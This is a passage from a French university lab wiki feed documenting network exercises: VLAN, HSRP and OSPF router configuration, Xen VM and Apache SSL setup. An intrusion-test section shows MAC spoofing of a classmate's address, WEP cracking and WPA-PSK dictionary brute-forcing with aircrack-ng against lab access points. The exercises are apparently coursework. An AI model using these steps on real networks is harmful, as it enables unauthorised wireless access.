&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23106</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23106"/>
				<updated>2015-11-20T11:32:20Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
